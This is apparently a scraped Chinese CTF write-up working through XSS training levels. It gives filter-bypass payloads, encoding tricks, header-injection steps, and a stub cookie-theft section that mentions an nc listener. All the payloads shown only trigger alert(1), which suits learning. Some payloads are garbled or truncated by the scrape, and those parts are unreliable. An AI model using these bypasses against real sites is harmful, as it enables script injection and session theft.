XSS刷题之旅

0x01 一些资源或文章：

XSS小结
XSS总结
那些年我们没能bypass的xss filter
XSS Filter Evasion Cheat Sheet 中文版
XSS攻击手段&在CTF中的运用

0x02 常用Payload（慢慢积累…）

aa
aa
aa

需要用编码绕过时：
Base64：M

urlencode：M 

HTML实体编码 ：M
aa
bb
cc



<iframe src="aaa" onmouseover=alert('xss') /><iframe>
<iframe src="javascript&colon;prompt&lpar;`xss`&rpar;">

Cookie盗取：

nc监听端口1234

Tips:

- 反引号代替圆括号
- 换行绕过正则
- ,也可以用--!>闭合
- //可以用换行来绕过
- 都可以在html的script标签里单独使用进行单行注释
- ſ 符号转换为大写后正好为大写字母 S
- 可以用 %0a 代替空格进行绕过

0x03 XSS编码

JS编码

JS提供了四种字符编码的策略，

三个八进制数字，如果数字不够，在前面补零，如a的编码为\141
两个十六进制数字，如果数字不够，在前面补零，如a的编码为\x61
四个十六进制数字，如果数字不够，在前面补零，如a的编码为\u0061
对于一些控制字符，使用特殊的C类型的转义风格，如\n和\r

HTML实体编码

命名实体
以&开头，以分号结尾的，如<的编码为&1t;

字符编码
十进制，十六进制的ASCII码或者Unicode字符编码。样式为&#数值;

如<的编码为

<(10进制)

<(16进制)

URL编码

这里为url全编码，也就是两次url编码

如alert的url全编码为%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34

String.fromCharCode编码

如alert的编码为String.fromCharCode(97,108,101,114,116)

0x04 刷题

haozi-xss-demo

项目：https://github.com/haozi/xss-demo
地址：https://xss.haozi.me
包含alert(1)的js文件地址：https://xss.haozi.me/j.js
过关方式：构造input code，成功执行alert(1)

0x00

server code:

function render (input) {
  return '' + input + '
'
}

直接构造js语句即可。

payload:

<script>alert(1)script>

html:

<div><script>alert(1)script>div>

0x01

server code:

function render (input) {
  return ''</span> <span class="token operator">+</span> input <span class="token operator">+</span> <span class="token string">''
}

这一关插入的地方在html标签里面，所以要先闭合</code>标签，再进行构造。 nput code: <pre><code class="prism language-html"></textarea><script>alert(1)</script> </code></pre> html: <pre><code class="prism language-html"><textarea></textarea><script>alert(1)</script></textarea> </code></pre> <h6>0x02</h6> server code: <pre><code class="prism language-javascript">function render (input) { return '<input type="name" value="' + input + '">' } </code></pre> input的地方在尖括号内部，需要先闭合尖括号。 payload: <pre><code class="prism language-html">"><script>alert(1)</script> </code></pre> html: <pre><code class="prism language-html"><input type="name" value=""><script>alert(1)</script>"> </code></pre> <h6>0x03</h6> server code: <pre><code class="prism language-javascript">function render (input) { const stripBracketsRe = /[()]/g input = input.replace(stripBracketsRe, '') return input } </code></pre> 这一关用正则表达式过滤了括号（替换为空），这里有个小tip，可以用反引号代替圆括号。 其他关于过滤圆括号的一些方法，可参考：XSS相关一些个人Tips payload: <pre><code class="prism language-html"><script>alert`1`</script> </code></pre> html: <pre><code class="prism language-html"><script>alert`1`</script> </code></pre> <h6>0x04</h6> server code: <pre><code class="prism language-javascript">function render (input) { const stripBracketsRe = /[()`]/g input = input.replace(stripBracketsRe, '') return input } </code></pre> 过滤了圆括号和反引号，所以上一关的方法就不能用了。 可以用各种编码进行绕过，如url编码、html实体编码。 <ul> <li><code><svg></code>标签中可以直接执行实体字符,payload2</li> <li>h5中<code>iframe</code>标签的<code>srcdoc</code>属性，<code>srcdoc</code>里的代码会作为<code>iframe</code>中的内容显示出来，<code>srcdoc</code>中可以直接去写转译后的html片段,payload3</li> </ul> payload: <pre><code class="prism language-html"><img src=1 οnerrοr=location="javascript:alert%281%29"> <svg><script>alert&#40;1&#41;</script> <iframe srcdoc="<script>alert(1)</script>"> </code></pre> <h6>0x05</h6> server code: <pre><code class="prism language-javascript">function render (input) { input = input.replace(/-->/g, '?') return '' } </code></pre> 这一关将html中的注释符<code>--></code>替换成了一个表情，并且输入的内容是包含在一段注释符里的。 html通常的的注释符为：<code></code>，测试发现<code><!- -!></code>、<code></code>将后面的<code>')</code>注释掉。 经过我自己的测试，<code></code>都可以在html的<code>script</code>标签里单独使用进行单行注释.，这里<code><</code>被过滤了，所以使用<code>--></code> payload: <pre><code class="prism language-html"> alert(1); --> </code></pre> html: <pre><code class="prism language-html"><script> // alert(' alert(1); -->') </script> </code></pre> <h6>0x0E</h6> server code: <pre><code class="prism language-javascript">function render (input) { input = input.replace(/<([a-zA-Z])/g, '<_$1') input = input.toUpperCase() return '<h1>' + input + '</h1>' } </code></pre> 匹配以<code><</code>起始的字符，替换为<code><_$1</code>，并且把输入转换为大写，这样这样的标签就都用不了了。 这里有个tip： 发现了一个<code>ſ</code>字符，是古英语中<code>s</code>的写法，但现在不会当作英文字母a-zA-Z，关键是<code>ſ</code>转换为大写后正好为<code>S</code>，这样就可以绕过正则使用<code><script></code>标签引如外部js。 payload: <pre><code class="prism language-html"><ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script> </code></pre> html: <pre><code class="prism language-html"><h1><SCRIPT SRC="HTTPS://WWW.SEGMENTFAULT.COM.HAOZI.ME/J.JS"></SCRIPT></h1> </code></pre> <h6>0x0F</h6> server code: <pre><code class="prism language-javascript">function render (input) { function escapeHtml(s) { return s.replace(/&/g, '&') .replace(/'/g, ''') .replace(/"/g, '"') .replace(/</g, '<') .replace(/>/g, '>') .replace(/\//g, '/') } return `<img src οnerrοr="console.error('${escapeHtml(input)}')">` } </code></pre> 过滤了<code>& ' " < > /</code>，转换为了html实体编码，但是由于input code在img标签内，所以html实体编码是可以被直接解析的。 所以闭合前面的标签，在构造语句即可。 payload: <pre><code class="prism language-html">');alert('1 </code></pre> html: <pre><code class="prism language-html"><img src onerror="console.error('');alert('1')"> 实际上就是 <img src onerror="console.error('');alert('1')"> </code></pre> <h6>0x10</h6> server code: <pre><code class="prism language-javascript">function render (input) { return ` <script> window.data = ${input} </script> ` } </code></pre> 由于input实在script标签里面，且没有任何过滤，所以直接闭合前面的语句，构造下一条语句即可。 payload: <pre><code class="prism language-html">'';alert(1) </code></pre> html: <pre><code class="prism language-html"><script> window.data = '';alert(1) </script> </code></pre> <h6>0x11</h6> server code: <pre><code class="prism language-javascript">// from alf.nu function render (s) { function escapeJs (s) { return String(s) .replace(/\\/g, '\\\\') .replace(/'/g, '\\\'') .replace(/"/g, '\\"') .replace(/`/g, '\\`') .replace(/</g, '\\74') .replace(/>/g, '\\76') .replace(/\//g, '\\/') .replace(/\n/g, '\\n') .replace(/\r/g, '\\r') .replace(/\t/g, '\\t') .replace(/\f/g, '\\f') .replace(/\v/g, '\\v') // .replace(/\b/g, '\\b') .replace(/\0/g, '\\0') } s = escapeJs(s) return ` <script> var url = 'javascript:console.log("${s}")' var a = document.createElement('a') a.href = url document.body.appendChild(a) a.click() </script> ` } </code></pre> 用反斜杠转移了一堆字符，但是<code>"</code>被转义成<code>\"</code>正好可以闭合<code>console.log("\")</code>，既然闭合了前面的语句那么之后就构造后面的语句就行了。 payload: <pre><code class="prism language-html">"),alert(1)// ");alert("1 "),alert(1)(" 这三个都可以.. </code></pre> html: <pre><code class="prism language-html"><script> var url = 'javascript:console.log("\"),alert(1)\/\/")' var a = document.createElement('a') a.href = url document.body.appendChild(a) a.click() </script> </code></pre> <h6>0x12</h6> server code: <pre><code class="prism language-javascript">// from alf.nu function escape (s) { s = s.replace(/"/g, '\\"') return '<script>console.log("' + s + '");</script>' } </code></pre> 匹配<code>"</code>替换为<code>\"</code>，这里直接用<code>\")</code>闭合前面的双引号会被转义，所以在加一个<code>\</code>来转义<code>\</code>即可。 payload: <pre><code class="prism language-html">\");alert(1);</script> </code></pre> html: <pre><code class="prism language-html"><script>console.log("\\");alert(1);</script>");</script> </code></pre> 这一套题主要是熟悉一下基本绕过方式，实战性不是很强，初学XSS还需继续努力。 那么就再刷一套题吧 <h4>XSS挑战</h4> 题目地址：http://test.xss.tv/ <h5>Level 1</h5> 输入的地方，在h2标签内，先闭合标签再构造。 payload： <code></h2><script>alert(1)</script></code> <h5>Level 2</h5> <code><input name="keyword" value="input code"></code> 输入点在<code>input标签内部</code>，所以先闭合<code>input</code>标签。 payload： <code>"><script>alert(1)</script></code> <h5>Level 3</h5> 这一关输入点，同样在<code>input</code>标签的<code>value</code>值内，尝试上一关闭合标签构造，但是没有成功。 双引号闭合<code>value="</code>失败，单引号闭合成功。 然后利用onclick、onmouseover等事件进行弹窗。 注释掉后面的代码。 payload: <code>' onmouseover=alert(1)//</code> <h5>Level 4</h5> 与上一关类似，用双引号闭合<code>value="</code>即可。 payload: <code>" onclick=alert(1)//</code> <h5>Level 5</h5> 这一关会将<code>script</code>替换成<code>scr_ipt</code>，<code>on</code>也会被替换成<code>o_n</code>。 我们可以闭合<code><input></code>后利用<code><a></code>标签进行弹窗： payload: <code>"><a href="javascript:alert(1)">Lethe</a>//</code> <h5>Level 6</h5> 这一关在上一关的基础上，多过滤了<code>href</code>、<code>src</code>、<code>data</code>。 经测试，可以利用大小写进行绕过。 payload： <code>"><a hREf="javascript:alert(1)">Lethe</a>//</code> <h5>Level 7</h5> 先用之前的payload进行测试，发现<code>href</code>和<code>script</code>直接消失了，于是尝试双写绕过，成功。 payload: <code>"><a hrhrefef="javascriscriptpt:alert(1)">Lethe</a>//</code> <h5>Level 8</h5> 这一关和前面稍有不同，可以添加友情链接，添加过后的内容直接包含在<code><a href="input code">友情链接</a></code>里面。 于是先尝试<code>javascritpt:alert(1)</code>，但是<code>script</code>同样被替换成了<code>scr_ipt</code>。 因为html标签内可以直接解析html实体编码，于是尝试用实体编码绕过。 payload: <code>javascript:alert(1)</code> <h5>Level 9</h5> 和上题类似，但是这里对链接有了一定要求，必须包含<code>http://</code>，却没有要求一定要在开头…不知道有什么意义 所以直接在构造的语句最后加上<code>http://</code>绕过检测，再注释掉即可。 payload： <code>javascript:alert(1)//http://</code> <h5>Level 10</h5> 这题没有输入框，url上给了一个keyword参数，尝试闭合再构造，虽然回显的内容没有过滤，但是却不会弹窗，查看源码，发现还有一个隐藏的form表单，看看能否利用。 <a href="http://img.e-com-net.com/image/info8/17b519a30a0b46248baac811f2493825.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/17b519a30a0b46248baac811f2493825.png" alt="XSS刷题之旅_第1张图片" width="458" height="160" style="border:1px solid black;"></a> 尝试<code>?t_link=Lethe&t_history=Lethe&t_sort=Lethe</code> 发现<code>t_sort</code>参数可以利用 <a href="http://img.e-com-net.com/image/info8/8648cd9599ee4c9cb8d47e318469bb22.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/8648cd9599ee4c9cb8d47e318469bb22.png" alt="XSS刷题之旅_第2张图片" width="435" height="103" style="border:1px solid black;"></a> 于是进行构造，发现尖括号被过滤了，于是利用事件进行弹窗。 payload: <code>?t_sort=" type=image src=x onerror=alert(1)//</code> <h5>Level 11</h5> 和上一关一样有一个隐藏的表单，也是<code>t_sort</code>参数可以利用 <a href="http://img.e-com-net.com/image/info8/2f847e1b6d8641feb083f6ea8db64aef.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/2f847e1b6d8641feb083f6ea8db64aef.png" alt="XSS刷题之旅_第3张图片" width="420" height="119" style="border:1px solid black;"></a> 用上一关的payload进行测试，发现双引号也被过滤了，应该又要换个思路了。 重新打开页面观察源码，看到一个可疑的地方，那新增的一个参数不是白加的，当你从第10关跳到第11关时，<code>t_ref</code>的value值是页面的Referer的值。 <a href="http://img.e-com-net.com/image/info8/7ba40a0e5e43439b8848a55480a634f3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/7ba40a0e5e43439b8848a55480a634f3.jpg" alt="在这里插入图片描述" width="650" height="75"></a> 于是在跳转的时候抓包修改Referer的值为<code>" type=text onclick="alert(1)</code>，如下： <a href="http://img.e-com-net.com/image/info8/ce96f170360644aba63a2611d4e44812.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ce96f170360644aba63a2611d4e44812.jpg" alt="XSS刷题之旅_第4张图片" width="650" height="241" style="border:1px solid black;"></a> 然后在Target界面Forward，回到闯关页面发现已成功注，点击输入框即可弹窗。 <a href="http://img.e-com-net.com/image/info8/fdf9ad88bb0f4bcfaa8dcb4fda558855.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/fdf9ad88bb0f4bcfaa8dcb4fda558855.jpg" alt="XSS刷题之旅_第5张图片" width="575" height="558" style="border:1px solid black;"></a> <h5>Level 12</h5> 与上一关类似，不过这里是利用User-Agent: <a href="http://img.e-com-net.com/image/info8/d4e1926722bf4aa8b393112d8fa75ec4.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d4e1926722bf4aa8b393112d8fa75ec4.jpg" alt="XSS刷题之旅_第6张图片" width="650" height="241" style="border:1px solid black;"></a> 同样抓包修改User-Agent的值进行构造 <a href="http://img.e-com-net.com/image/info8/3ad33406d7424b59a46d1d00ae3a89e6.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/3ad33406d7424b59a46d1d00ae3a89e6.jpg" alt="XSS刷题之旅_第7张图片" width="650" height="242" style="border:1px solid black;"></a> payload: <code>" type=text onclick="alert(1)</code> <h5>Level 13</h5> 与前两关相同，只不过这一关是利用Cookie进行注入。 <a href="http://img.e-com-net.com/image/info8/48ee002f004646dc8f3321278182e1b9.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/48ee002f004646dc8f3321278182e1b9.jpg" alt="XSS刷题之旅_第8张图片" width="650" height="242" style="border:1px solid black;"></a> 抓包修改Cookie为：<code>user=" type=text onclick="alert(1)</code>即可 <a href="http://img.e-com-net.com/image/info8/85e73e2e23464693b4e06ca02054686b.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/85e73e2e23464693b4e06ca02054686b.jpg" alt="XSS刷题之旅_第9张图片" width="650" height="240" style="border:1px solid black;"></a> <h5>Level 14</h5> 进入14关，没有输入框，url中没有参数，查看源码，发现使用了<code><iframe></code>标签引入了<code>http://www.exifviewer.org/</code> 但是我这边一直打不开<code>http://www.exifviewer.org/</code>，根据网上的题解，上传一个含有xss代码的图片触发xss，关于exif xss这一题的解法，可参考:https://xz.aliyun.com/t/1206 <h5>Level 15</h5> 页面什么都没有，那么直接看源码 <a href="http://img.e-com-net.com/image/info8/b96782ff8b404a0ab99c428920dd8f8c.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/b96782ff8b404a0ab99c428920dd8f8c.jpg" alt="XSS刷题之旅_第10张图片" width="650" height="205" style="border:1px solid black;"></a>第一眼看貌似也没什么，实际上还是因为我对js不是很熟悉…搜索得到，这里使用了AngularJS框架的 <code>ng-include</code> 指令，可参考：https://www.runoob.com/angularjs/ng-ng-include.html 其实就是可以利用 <code>ng-include</code> 指令来包含文件> 有两默认情况下，包含的文件需要包含在同一个域名下，也就是符合SOP。 所以网上大多方法是包含了第一关的代码，如下payload：<code>?src='level1.php?name=test<img src=1 onerror=alert(1)>'</code> 但是我在做的过程中发现，引用的名字会直接出现在源码上： <a href="http://img.e-com-net.com/image/info8/9ee35e96f95842ecac755514992368a3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/9ee35e96f95842ecac755514992368a3.jpg" alt="XSS刷题之旅_第11张图片" width="650" height="372" style="border:1px solid black;"></a> 那么理论上通过闭合也是可以的 于是尝试payload: <code>?src="><img src="x" onerror=alert(1)></code> 发现真的是可以的…<a href="http://img.e-com-net.com/image/info8/fcc02731eeeb420c83dd2761938079b0.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/fcc02731eeeb420c83dd2761938079b0.jpg" alt="XSS刷题之旅_第12张图片" width="650" height="449" style="border:1px solid black;"></a> <h5>Level 16</h5> 输入点包含在<code><center></code>标签内，过滤了空格，可以用<code>%0a</code>代替空格进行绕过。 payload: <code>?keyword=<img%0asrc=x%0aonerror=alert(1)></code> <h5>Level 17</h5> 进入之后会看到一个关于flash的什么东西，暂时先不管，做xss先找输入输出点。 url中有<code>arg01</code>和<code>arg02</code>两个参数，应该是输入点，查看源码发现在<code><embed></code>标签的<code>src</code>中会输出这两个参数的值，如下： <a href="http://img.e-com-net.com/image/info8/aef509c7a1d248e7b0ad39745b0cf8c6.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/aef509c7a1d248e7b0ad39745b0cf8c6.jpg" alt="XSS刷题之旅_第13张图片" width="650" height="229" style="border:1px solid black;"></a> 先试试闭合，发现过滤了尖括号，可以考虑用<code>onerror</code>弹窗。 payload： <code>?arg01=&arg02= onmouseover=alert(1)</code> <h5>Level 18</h5> 这一关和17关好像是一样的… payload: <code>?arg01=&arg02= onmouseover=alert(1)</code> Level 19 20 好像是关于flash xss的，由于了解不多，而且现在网站用flash的也越来越少了，就不做了。 <h3>0x05 小结</h3> 做了这两套题，这只能说是刚刚了解了XSS是什么，还要很多很多知识需要学习，尤其是要加强实战方面的运用，这就只能在以后的学习过程中慢慢积累了。 </div> </div> </div> </div> </div>  <div id="SOHUCS" sid="1292948364433891328"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script>  <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad">  <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div>  <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div>  <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(CTF,XSS)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1833713785567801344.htm" title="【网络安全】空字节绕过：URL回调+XSS+SQL绕WAF" target="_blank">【网络安全】空字节绕过：URL回调+XSS+SQL绕WAF</a> 秋说 <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a> <div>未经许可，不得转载。文章目录空字节URL回调XSSSQL空字节\0，也称为null字节，是一个值为零的特殊字符。在编程中，通常用来表示字符串的结束。攻击者可以利用null字节注入来绕过一些验证或过滤机制。以下三个漏洞，空字节功不可没。URL回调密码重置功能，发起请求后，邮箱会收到链接。请求包中存在callbackUrl参数：在参数中添加/test，发包后，邮箱中的链接为https://compan</div> </li> <li><a href="/article/1833694749207392256.htm" title="BUUCTF 2021-10-4 Pwn" target="_blank">BUUCTF 2021-10-4 Pwn</a> Ch1lkat <a class="tag" taget="_blank" href="/search/BUUCTF/1.htm">BUUCTF</a><a class="tag" taget="_blank" href="/search/Pwn/1.htm">Pwn</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/pwn/1.htm">pwn</a> <div>文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe</div> </li> <li><a href="/article/1833693867304644608.htm" title="C# 关于多线程同步不同实现方式" target="_blank">C# 关于多线程同步不同实现方式</a> 語衣 <a class="tag" taget="_blank" href="/search/C%23/1.htm">C#</a><a class="tag" taget="_blank" href="/search/%E7%9F%A5%E8%AF%86%E8%A1%A5%E5%85%85/1.htm">知识补充</a><a class="tag" taget="_blank" href="/search/c%23/1.htm">c#</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>栏目总目录AutoResetEventclassMainClass{//thearrayofconsumerthreadsprivatestaticListconsumers=newList();//thetaskqueueprivatestaticQueuetasks=newQueue();//thesynchronisationobjectforlockingthetaskqueuepriva</div> </li> <li><a href="/article/1833662347978305536.htm" title="Android里的设计模式" target="_blank">Android里的设计模式</a> jim_dayday_up <a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/Android_%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/1.htm">Android_基础知识</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>一：设计模式分类经典的23种设计模式是由ErichGamma、RichardHelm、RalphJohnson和JohnVlissides（合称“GangofFour”）在他们的书《设计模式：可复用面向对象软件的基础》中定义的。以下是这些设计模式的分类和简要介绍。1.1创建型模式单例模式(Singleton)：确保一个类只有一个实例，并提供一个全局访问点。抽象工厂模式(AbstractFactor</div> </li> <li><a href="/article/1833514971900768256.htm" title="Java Web安全与Spring Config对象实战" target="_blank">Java Web安全与Spring Config对象实战</a> 福建低调 <div>本文还有配套的精品资源，点击获取简介：本课程深入探讨JavaWeb开发中的安全实践，包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时，介绍SpringSecurity框架的应用，以及Config对象在Spring配置管理中的作用，包括依赖注入和外部化配置。课程还包括实战演练，通过设置安全环境和安全漏洞模拟，帮助开发者提升应用的安全性和故障排查能力。1.Web安全</div> </li> <li><a href="/article/1833467445176791040.htm" title="软考——简单记忆设计模式" target="_blank">软考——简单记忆设计模式</a> Yeira <a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>抽象工厂模式（AbstractFactory）:提供一个接口，可以创建一系列相关或相互依赖的对象，而无需指定它们具体的类。（一个接口创建相关对象，无需具体的类）构建器模式（Builder）：将一个复杂类的表示与其构造相分离，使得相同的构建过程能够得出不同的表示。（相同是构造，不同的表示）工厂方法模式（FactoryMethod）：定义一个创建对象的接口，但由子类决定需要实例化哪一个类。工厂方法使得</div> </li> <li><a href="/article/1833460888930185216.htm" title="【软考】设计模式之抽象工厂模式" target="_blank">【软考】设计模式之抽象工厂模式</a> 王佑辉 <a class="tag" taget="_blank" href="/search/%E8%BD%AF%E8%80%83/1.htm">软考</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/%E8%BD%AF%E8%80%83/1.htm">软考</a> <div>目录1.说明2.应用场景3.结构图4.构成5.适用性6.优点7.缺点8.java示例1.说明1.提供一个创建一系列相关或相互依赖对象的接口，而无须指定它们具体的类。2.抽象工厂模式（AbstractFactoryPattern）是一种创建型设计模式。3.抽象工厂模式用于系统的产品族，而不仅仅是一个等级结构；一个等级的抽象类只能创建一个等级的产品，而抽象工厂模式能创建多个等级的产品。2.应用场景1.</div> </li> <li><a href="/article/1833395689711824896.htm" title="【网络安全】URL解析器混淆绕过CSP实现XSS" target="_blank">【网络安全】URL解析器混淆绕过CSP实现XSS</a> 秋说 <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a> <div>未经许可，不得转载。文章目录前言正文前言许多流行的静态网站生成器都存在图像CDN功能，它们通过优化网站中的图像来加快页面加载速度。例如：1、OptimizingImages|Next.js利用内置的next/image组件优化图像（nextjs.org）2、NuxtImage:Nuxt应用的图像优化即插即用的图像优化功能，使用内置优化器对图像进行调整（image.nuxt.com）这些工具的目标都</div> </li> <li><a href="/article/1833313892722372608.htm" title="XSS和sql注入部分场景测试用例样例" target="_blank">XSS和sql注入部分场景测试用例样例</a> 谷隐凡二 <a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95/1.htm">测试</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E7%94%A8%E4%BE%8B/1.htm">测试用例</a> <div>目录1.SQL注入测试用例设计基本SQL注入复杂SQL注入盲注测试2.XSS攻击测试用例设计基本XSS攻击复杂XSS攻击DOM-basedXSS1.SQL注入测试用例设计SQL注入攻击通常通过在输入字段中插入恶意SQL代码，试图操纵数据库查询。设计这些测试用例时，需要涵盖各种常见的SQL注入技术。基本SQL注入用例1:使用单引号:输入:'OR'1'='1预期结果:应拒绝输入并返回错误消息，不应允许</div> </li> <li><a href="/article/1833253416458088448.htm" title="30、基于SelectFromModel和LassoCV的特征选择" target="_blank">30、基于SelectFromModel和LassoCV的特征选择</a> 凌晨思索 <div>30、基于SelectFromModel和LassoCV的特征选择importmatplotlib.pyplotaspltimportnumpyasnpfromsklearn.datasetsimportload_diabetesfromsklearn.feature_selectionimportSelectFromModelfromsklearn.linear_modelimportLasso</div> </li> <li><a href="/article/1833210508078051328.htm" title="【鸿蒙HarmonyOS开发笔记】使用@Preview装饰器预览组件" target="_blank">【鸿蒙HarmonyOS开发笔记】使用@Preview装饰器预览组件</a> Luxine. <a class="tag" taget="_blank" href="/search/%E9%B8%BF%E8%92%99HarmonyOS%E5%BC%80%E5%8F%91%E7%AC%94%E8%AE%B0/1.htm">鸿蒙HarmonyOS开发笔记</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E5%88%86%E4%BA%AB/1.htm">前端分享</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E5%8D%8E%E4%B8%BA/1.htm">华为</a><a class="tag" taget="_blank" href="/search/harmonyos/1.htm">harmonyos</a> <div>概述ArkTS应用/服务支持组件预览，要求compileSdkVersion为8或以上。组件预览支持实时预览，不支持动态图和动态预览。组件预览通过在组件前添加注解@Preview实现，在单个源文件中，最多可以使用10个@Preview装饰自定义组件。@Preview的使用参考如下示例@Preview({title:'FoodImage'})@ComponentstructFoodImageDisp</div> </li> <li><a href="/article/1833203696817762304.htm" title="vue3+tesseract 图片文字提取" target="_blank">vue3+tesseract 图片文字提取</a> 妙明元心 <a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a><a class="tag" taget="_blank" href="/search/ecmascript/1.htm">ecmascript</a> <div>github:https://github.com/naptha/tesseract.js可实现多语言识别，中英文混合识别demo如下：importTesseractfrom"tesseract.js"//方式1：Tesseract.recognize('http://localhost:5173/vue.jpg','eng+chi_sim',).then((d)=>{console.log(d.</div> </li> <li><a href="/article/1833198566185725952.htm" title="iOS M1芯片Mac上Xcode模拟器报错解决" target="_blank">iOS M1芯片Mac上Xcode模拟器报错解决</a> aven_kang <div>真机编译可以通过，模拟器失败，出现以下错误...,buildingforiOSSimulator,butlinkinginobjectfilebuiltforiOS,file'...'或者couldnotfindmodulefortarget'x86_64-apple-ios-simulator'解决方案一1.添加arm64到项目PEROJECT和TARGETS的ExcludedArchitect</div> </li> <li><a href="/article/1833100544881815552.htm" title="深入解析：23种软件设计模式详解及其分类（创建型、结构型、行为型）附代码示例DEMO" target="_blank">深入解析：23种软件设计模式详解及其分类（创建型、结构型、行为型）附代码示例DEMO</a> J^T <a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/C%2FC%2B%2B/1.htm">C/C++</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/%E8%A3%85%E9%A5%B0%E5%99%A8%E6%A8%A1%E5%BC%8F/1.htm">装饰器模式</a><a class="tag" taget="_blank" href="/search/%E7%BB%84%E5%90%88%E6%A8%A1%E5%BC%8F/1.htm">组合模式</a><a class="tag" taget="_blank" href="/search/%E8%A7%82%E5%AF%9F%E8%80%85%E6%A8%A1%E5%BC%8F/1.htm">观察者模式</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E4%BE%8B%E6%A8%A1%E5%BC%8F/1.htm">单例模式</a><a class="tag" taget="_blank" href="/search/23%E7%A7%8D%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">23种设计模式</a> <div>目录引言一、创建型模式1.简单工厂模式（SimpleFactoryPattern）2.抽象工厂模式（AbstractFactoryPattern）3.单例模式（SingletonPattern）4.建造者模式（BuilderPattern）5.原型模式（PrototypePattern）二、结构型模式1.适配器模式（AdapterPattern）2.桥接模式（BridgePattern）3.装饰器</div> </li> <li><a href="/article/1833071915242188800.htm" title="OSError: libnccl.so.2: cannot open shared object file: No such file or directory" target="_blank">OSError: libnccl.so.2: cannot open shared object file: No such file or directory</a> 王小葱鸭 <a class="tag" taget="_blank" href="/search/python/1.htm">python</a> 